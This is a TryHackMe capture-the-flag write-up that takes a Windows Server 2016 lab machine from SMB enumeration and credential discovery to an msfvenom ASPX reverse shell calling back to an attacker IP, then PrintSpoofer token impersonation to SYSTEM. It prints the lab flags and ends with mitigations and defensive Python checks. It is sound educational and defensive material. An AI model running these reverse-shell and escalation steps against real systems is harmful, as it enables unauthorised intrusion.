Exploit SMB misconfigurations to access sensitive files, upload a web shell, and escalate privileges using token impersonation on Windows Server 2016.

Relevant - TryHackMe Writeup

Relevant is a Windows-based machine focused on SMB enumeration, web shell deployment, and Windows token impersonation privilege escalation.

Difficulty: Medium ⭐⭐
Operating System: Windows Server 2016
Themes: SMB Enumeration, Web Shell Deployment, Windows Token Impersonation


Objectives

  1. Enumerate SMB shares for sensitive information
  2. Gain initial access via web shell upload
  3. Exploit token impersonation for privilege escalation
  4. Capture user and root flags

Reconnaissance

Nmap Scan

Performed comprehensive port scanning:

nmap -p1-65535 --min-rate 1000 10.10.134.54

Results:

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown

Service Version Detection

nmap -sCV -p 80,135,445,3389,49663,49666,49667 10.10.134.54

Key Findings:

  • Port 80/49663: Microsoft IIS httpd 10.0
  • Port 445: Windows Server 2016 Standard Evaluation 14393
  • Port 3389: RDP service available
  • Ports 135,49666,49667: Microsoft Windows RPC services

SMB Share Enumeration

smbclient -L \\\\10.10.134.54

Discovered Shares:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
nt4wrksv        Disk      # Interesting - accessible share

Initial Access

Accessing Sensitive Files

Connected to the accessible SMB share:

smbclient //10.10.134.54/nt4wrksv

Files Found:

passwords.txt - 98 bytes

Credential Extraction

File Content:

[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Decoded Credentials:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
# Result: Bob - !P@$$W0rD!123

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
# Result: Bill - Juw4nnaM4n420696969!$$$

Valid Credentials:

  • Username: Bob
  • Password: !P@$$W0rD!123

Web Shell Deployment

  1. Generate ASPX Reverse Shell:

     msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.109.66 LPORT=4444 -f aspx -o rev.aspx

  2. Upload via SMB:

     smbclient //10.10.134.54/nt4wrksv
     smb: \> put rev.aspx

  3. Access Web Shell:

     http://10.10.134.54:49663/nt4wrksv/rev.aspx

  4. Receive Reverse Shell:

     nc -nlvp 4444

Initial Shell Access

c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool

Lateral Movement

User Flag Capture

c:\Users\Bob\Desktop>type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}

Privilege Enumeration

whoami /priv

Key Privileges:

SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled

Critical Finding: SeImpersonatePrivilege is enabled - perfect for token impersonation attacks.
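The same check a defender would run across service and app-pool identities before an attacker does, as an added example (not part of the original writeup): it parses the text format of `whoami /priv` and reports enabled privileges that are commonly abused for token impersonation or similar escalation. The sample output and the risk list are constructed assumptions, not taken from the page.

```python
"""Flag enabled token privileges that let a compromised service account escalate.

Added example: parses `whoami /priv` text (the format captured on the IIS app
pool account above). HIGH_RISK_PRIVILEGES is an assumed review list.
"""
import re

# Privileges worth reviewing on any service or app-pool identity (assumed list).
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation (the PrintSpoofer path above)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation via primary token",
    "SeDebugPrivilege": "access to other processes' memory",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
}

# Constructed sample, mirroring the two lines captured in the writeup.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege       Create global objects                     Disabled
"""

# One row: privilege name, free-text description, then the State column.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def find_risky_privileges(text):
    """Return sorted (privilege, reason) pairs for enabled high-risk privileges."""
    privs = parse_privileges(text)
    return sorted(
        (name, HIGH_RISK_PRIVILEGES[name])
        for name, state in privs.items()
        if state == "Enabled" and name in HIGH_RISK_PRIVILEGES
    )
```

Feed it the output of `whoami /priv` collected from each service account; any hit is a candidate for running the service under a less privileged identity.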


Privilege Escalation

PrintSpoofer Exploitation

  1. Download PrintSpoofer:
  2. Transfer to Target:

     # Via SMB upload
     smbclient //10.10.134.54/nt4wrksv
     smb: \> put PrintSpoofer.exe

  3. Execute Exploit:

     .\PrintSpoofer.exe -i -c cmd

Successful Exploitation:

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Root Flag Capture

C:\Users\Administrator\Desktop>type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

Key Takeaways

Attack Path Summary:

Port Scanning → SMB Enumeration → Credential Discovery →
Web Shell Upload → Initial Access → Privilege Enumeration →
Token Impersonation → SYSTEM Access

Vulnerabilities Exploited:

  1. SMB Misconfiguration - World-readable SMB share
  2. Weak Credential Storage - Base64-encoded passwords in accessible file
  3. IIS Misconfiguration - Web-accessible SMB share directory
  4. Windows Token Privilege - Enabled SeImpersonatePrivilege

Mitigation Strategies:

  1. For SMB Security:
    • Restrict anonymous access to SMB shares
    • Implement proper share permissions
    • Regularly audit SMB configurations
    • Disable unnecessary SMB protocols
  2. For Credential Security:
    • Avoid storing credentials in plain text or weak encoding
    • Implement proper credential management systems
    • Regular password rotation policies
    • Multi-factor authentication
  3. For Windows Security:
    • Principle of least privilege for service accounts
    • Regular review of user privileges
    • Disable dangerous privileges when not required
    • Implement AppLocker or similar restrictions
  4. For Web Server Security:
    • Restrict web server directory traversal
    • Regular web application security testing
    • Input validation and sanitization
    • Web shell detection mechanisms
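An added example of two of the checks above (not code from the writeup): it flags SMB shares whose physical path is also an IIS virtual directory (the share-plus-web-root overlap that let rev.aspx execute) and lists server-executable files found inside such a path. The physical path of nt4wrksv is not stated on the page, so all share and virtual-directory data here is constructed.

```python
"""Audit for the share/IIS overlap that made the web shell upload possible.

Added example, not part of the original writeup. Share and virtual-directory
data is constructed; the real physical path of nt4wrksv is assumed.
"""
import os
import tempfile
from pathlib import PureWindowsPath

# Extensions IIS hands to the ASP.NET/ASP handlers instead of serving as static content.
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".cshtml", ".config"}


def shared_and_served(shares, vdirs):
    """Return (share_name, url_path) pairs whose physical paths coincide or nest.
    shares: {share_name: physical_path}; vdirs: {url_path: physical_path}."""
    hits = []
    for sname, spath in shares.items():
        sp = PureWindowsPath(spath)  # PureWindowsPath compares case-insensitively, like NTFS
        for url, ppath in vdirs.items():
            pp = PureWindowsPath(ppath)
            if sp == pp or sp in pp.parents or pp in sp.parents:
                hits.append((sname, url))
    return hits


def webshell_candidates(root):
    """Return sorted paths under root whose extension IIS would execute."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SERVER_EXECUTABLE:
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def demo():
    """Run both checks on constructed data shaped like this box's layout."""
    shares = {"nt4wrksv": "C:\\inetpub\\wwwroot\\nt4wrksv", "Public": "D:\\Data\\Public"}
    vdirs = {"/": "C:\\inetpub\\wwwroot", "/nt4wrksv": "c:\\INETPUB\\wwwroot\\nt4wrksv"}
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("passwords.txt", "rev.aspx"):  # constructed placeholder files
            with open(os.path.join(tmp, name), "w") as fh:
                fh.write("placeholder\n")
        flagged = [os.path.basename(p) for p in webshell_candidates(tmp)]
    return shared_and_served(shares, vdirs), flagged
```

On a real host the share list comes from `net share` and the virtual directories from the IIS configuration; a non-empty overlap means any write to the share is a write to the web root.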

Tools Used:

  • Nmap - Network reconnaissance
  • smbclient - SMB enumeration and file transfer
  • msfvenom - Payload generation
  • PrintSpoofer - Windows token impersonation exploit
  • Netcat - Reverse shell handling
  • Base64 - Credential decoding

Alternative Attack Vectors:

  1. RDP Access: Could use discovered credentials for direct RDP access
  2. SMB Relay: Potential for SMB relay attacks if NTLM authentication is enabled
  3. Windows Kernel Exploits: Could attempt kernel exploits based on Windows version

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.